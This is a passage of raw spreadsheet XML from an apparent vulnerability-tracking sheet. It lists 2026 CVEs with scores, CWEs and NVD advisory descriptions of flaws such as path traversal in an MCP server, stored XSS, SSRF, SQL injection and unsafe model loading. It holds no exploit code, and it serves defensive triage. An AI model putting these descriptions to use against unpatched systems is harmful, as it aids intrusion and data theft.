      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M552" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr"/>
      <c r="Q552" s="5" t="inlineStr">
        <is>
          <t>CWE-636, CWE-862</t>
        </is>
      </c>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, `djust.tenants` isolation was enforced only on the HTTP path. The current tenant was stored in `threading.local()` and set exclusively by the HTTP-only `TenantMiddleware`, so on the live (WebSocket/SSE) path `get_current_tenant()` was always `None` during mount and every event handler — and the tenant-aware `QuerySet` manager failed OPEN (returned the unfiltered queryset, ignoring `STRICT_MODE`), disclosing every tenant's rows to whoever held the socket. `threading.local` was additionally shared across connections on the `sync_to_async` executor thread. This issue is fixed in djust 1.0.7. Tenant storage moved to a `contextvars.ContextVar` (per async task); the resolved tenant is bound around WS/SSE mount and every dispatch; both managers scope the base queryset once and fail CLOSED (`.none()` under the default `STRICT_MODE`); and system check S006 warns when `STRICT_MODE=False`. No known workarounds are available on the live path.</t>
        </is>
      </c>
      <c r="S552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61595</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62997</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr"/>
      <c r="Q553" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>Kedro-Datasets provides data connectors for Kedro. From version 5.0.0 until 9.5.0, kedro_datasets_experimental.pytorch.PyTorchDataset in kedro-datasets loads .pt model files with torch.load without enforcing weights_only=True, and user-supplied load_args are silently dropped. On PyTorch versions earlier than 2.6, a malicious pickle-backed model from an attacker-influenced shared registry, downloaded checkpoint, or partitioned external source can execute arbitrary code when a Kedro pipeline loads it. The issue affects only the opt-in kedro_datasets_experimental component and does not affect users who load only trusted files. This issue is fixed in version 9.5.0.</t>
        </is>
      </c>
      <c r="S553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62997</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73439</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr"/>
      <c r="Q554" s="5" t="inlineStr">
        <is>
          <t>CWE-842</t>
        </is>
      </c>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS, if OpenConfig is configured and running a gNMI server on the system, and if gNSI Pathz is configured and a gNSI Pathz policy is present on the system, then gNMI may fail to correctly enforce the rules in this policy if both a group rule and a user rule for the same path is present in the policy. Under certain conditions, this can lead to an authenticated user gaining unauthorized permission to read or write gNMI paths that the Pathz policy is intended to restrict.</t>
        </is>
      </c>
      <c r="S554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73439</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73496</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr">
        <is>
          <t>atlassian</t>
        </is>
      </c>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr"/>
      <c r="Q555" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>MCP Atlassian is a Model Context Protocol (MCP) server for Atlassian products (Confluence and Jira). Prior to 0.22.0, the confluence_upload_attachment and confluence_upload_attachments tools pass a client-controlled file_path through src/mcp_atlassian/confluence/attachments.py upload_attachment, and the jira_update_issue attachments parameter reaches src/mcp_atlassian/jira/attachments.py upload_attachment, without confining either path to an approved server workspace. In a remote HTTP, SSE, or multi-user deployment, absolute or traversing paths are resolved on the MCP server and uploaded to Atlassian, allowing a client with write-tool access to disclose server files, environment-held Atlassian credentials, or another tenant's data. A local single-user stdio deployment does not cross this trust boundary because the server runs in the caller's environment. This issue is fixed in version 0.22.0.</t>
        </is>
      </c>
      <c r="S555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73496</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81210</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr"/>
      <c r="Q556" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 concatenates three caller-supplied strings into a String.format path on the shared /ds-storage RWX PVC and returns the file with no project ACL — pure IDOR plus traversal. Read is constrained to files named job.log/error.log, but DataStage job logs routinely carry connection strings, {dsnextenc} ciphertexts (decryptable via d2-f023), and customer-data row samples. This is the operator's tenant-to-tenant PVC-leakage threat verbatim; MEDIUM→HIGH via threat match.</t>
        </is>
      </c>
      <c r="S556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81210</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85385</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr"/>
      <c r="Q557" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.4 did not validate the user timezone value (uTimezone) on write and rendered it without output encoding on the Dashboard user management page, where Date::getTimezoneDisplayName() returns any non-IANA value unchanged. A stored cross-site scripting payload saved in this field executed in an administrator's browser when they viewed the affected user in the Dashboard, running script in the admin session (for example to read CSRF tokens, create administrator accounts, or change site settings). In Concrete CMS 9.5.3 the field became reachable by unauthenticated visitors through public registration; in Concrete CMS below 9.5.3,  the same field was reachable by any authenticated user through the account profile editor. Exploitation required concrete.misc.user_timezones to be enabled (off by default), and the unauthenticated path additionally required public registration to be enabled. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 7.7 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Suraj Bhosale for reporting.</t>
        </is>
      </c>
      <c r="S557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85385</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86474</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr"/>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>The lack of TLS certificate validation when downloading firmware updates in VEO and VEO-XS Wi-Fi monitors, in versions prior to 01.48.001, allows an attacker to perform man-in-the-middle attacks on the update channel.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86474</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86585</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>The lack of signature verification of firmware update packages in VEO and VEO-XS Wi-Fi monitors, in versions prior to 01.48.001, allows an attacker who controls the delivery of an update to install unauthorised firmware.</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86585</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87084</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a server-side request forgery vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87084</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87996</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.1, SafePlaywrightURLLoader in backend/open_webui/retrieval/web/utils.py validated a user-controlled hostname in Python and then let the Playwright browser resolve it again in the sync and async request interceptors. An authenticated user controlling authoritative DNS could return a public address to validation and an internal address to the browser, exposing responses from internal services or cloud metadata through web search or URL ingestion. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87996</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89060</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr">
        <is>
          <t>CWE-551</t>
        </is>
      </c>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>A cross-namespace authorization flaw in multicluster-observability-addon allows a user with permission to modify a managed cluster’s ManagedClusterAddOn configuration to reference ClusterLogForwarder or OpenTelemetryCollector resources outside the permitted namespace. If those resources reference Secrets, the add-on may copy the referenced Secrets to the attacker-controlled managed cluster.</t>
        </is>
      </c>
      <c r="S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89060</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90025</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="inlineStr"/>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: ucsi: displayport: Fix OOB altmode array index
The UCSI displayport driver indexes the connector's port altmode array
with the GET_CURRENT_CAM response after checking it is not 0xff. The
port altmode array is UCSI_MAX_ALTMODES elements long. If the PPM
returns an invalid GET_CURRENT_CAM response above UCSI_MAX_ALTMODES and
not equal to 0xff, the kernel may crash with an array index OOB error.
Update the UCSI displayport driver to verify the current cam is less
than UCSI_MAX_ALTMODES before accessing the port altmode array.</t>
        </is>
      </c>
      <c r="S563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90025</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76425</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the APIs of Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks against the backend database.
This vulnerability is due to insufficient validation of certain parameters that are concatenated directly into an SQL query. An attacker could exploit this vulnerability by sending a crafted request that contains SQL statements to an affected endpoint. A successful exploit could allow the attacker to read arbitrary content from the SQL database and conduct server-side request forgery (SSRF) attacks. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76425</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79639</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79639</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K566" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85197</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
